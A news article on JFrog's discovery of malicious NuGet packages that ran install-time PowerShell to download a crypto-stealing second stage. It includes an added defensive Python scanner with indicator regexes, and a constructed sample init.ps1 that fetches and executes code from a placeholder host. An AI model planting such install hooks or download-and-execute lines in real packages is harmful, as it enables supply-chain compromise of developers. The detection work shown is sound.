Threat actors have recently been observed using the open source package manager NuGet to create malicious packages targeting .NET developers. This discovery marks the first instance of malicious code found in NuGet packages in the wild, according to software package management company JFrog.
Shachar Menashe, senior director at JFrog Security Research, highlighted the significance of this finding, stating, “For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies. This proves that no open source repository is safe from malicious actors.”
The malicious packages identified by JFrog security researchers Natan Nehorai and Brian Moussalli were downloaded a staggering 150,000 times over the past month. These packages contained a ‘download & execute’ payload, specifically a PowerShell script that would execute upon installation and trigger the download of a more sophisticated second-stage payload. This second-stage payload includes a crypto stealer, an Electron archive extractor supporting code execution, and an auto-updater.
Upon notifying NuGet administrators of the malicious packages, the JFrog security experts were informed that the packages had been removed. However, Menashe emphasized that .NET developers remain at high risk of encountering malicious code, because NuGet packages retain the ability to run code upon installation, which is exactly how the observed packages operated.
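The install-time execution described above is the point a defender can check for before a package is ever restored. The following is an added example (not JFrog's tooling or code from the report): it opens a .nupkg, which is a zip archive, looks for the PowerShell hooks NuGet runs on install (`tools/init.ps1`, and `tools/install.ps1` for legacy packages.config installs), and flags "download & execute" indicators in them. The sample packages and indicator names are constructed for the demo.

```python
import io
import re
import zipfile

# Added example, not JFrog's tooling: flag NuGet packages that ship PowerShell install
# hooks and look for download-and-execute patterns in them. NuGet runs tools/init.ps1
# (and, for legacy packages.config installs, tools/install.ps1) from the Visual Studio
# Package Manager Console when a package is added to a solution.
INSTALL_HOOKS = ("tools/init.ps1", "tools/install.ps1")

# Constructed indicator set for "download & execute" behaviour in PowerShell.
SUSPICIOUS = {
    "web_download": re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|Start-BitsTransfer", re.I),
    "dynamic_exec": re.compile(r"Invoke-Expression|\biex\b|Start-Process", re.I),
    "encoded_cmd": re.compile(r"-EncodedCommand|FromBase64String", re.I),
}

def scan_nupkg(data: bytes) -> dict:
    """Return {hook_path: [indicator, ...]} for every install hook found in a .nupkg."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as pkg:
        for name in pkg.namelist():
            if name.lower() not in INSTALL_HOOKS:
                continue  # only install-time hooks are of interest here
            script = pkg.read(name).decode("utf-8", errors="replace")
            hits = [label for label, rx in SUSPICIOUS.items() if rx.search(script)]
            findings[name] = hits  # an empty list still means "this package runs a script"
    return findings

def build_nupkg(files: dict) -> bytes:
    """Build a constructed in-memory .nupkg (zip) for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for path, text in files.items():
            z.writestr(path, text)
    return buf.getvalue()

# Constructed sample: a package whose init.ps1 fetches and runs a second stage.
SUSPICIOUS_PKG = build_nupkg({
    "Sample.nuspec": "<package/>",
    "tools/init.ps1": "$u='http://example.invalid/stage2.ps1'\niex (Invoke-WebRequest $u).Content\n",
})
# Constructed sample: a package that ships only a library and no install hooks.
CLEAN_PKG = build_nupkg({"Clean.nuspec": "<package/>", "lib/net6.0/Clean.dll": ""})

if __name__ == "__main__":
    print(scan_nupkg(SUSPICIOUS_PKG))  # {'tools/init.ps1': ['web_download', 'dynamic_exec']}
    print(scan_nupkg(CLEAN_PKG))       # {}
```

Any package that returns a non-empty dictionary deserves manual review before it is allowed into a build, whether or not indicators fired, since the presence of an install hook alone means code will run at restore time.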
Even though the malicious packages have been removed, Menashe advised .NET developers to exercise caution when selecting open source components for their builds. He stressed the importance of maintaining a secure software supply chain throughout the software development lifecycle.
For more insights on securing open source software, readers can refer to an analysis by OpenUK CEO, Amanda Brock.
Overall, the incident involving malicious NuGet packages serves as a stark reminder of the persistent threats faced by developers in the open source ecosystem. It underscores the importance of vigilance and proactive security measures to safeguard against malicious actors targeting software repositories.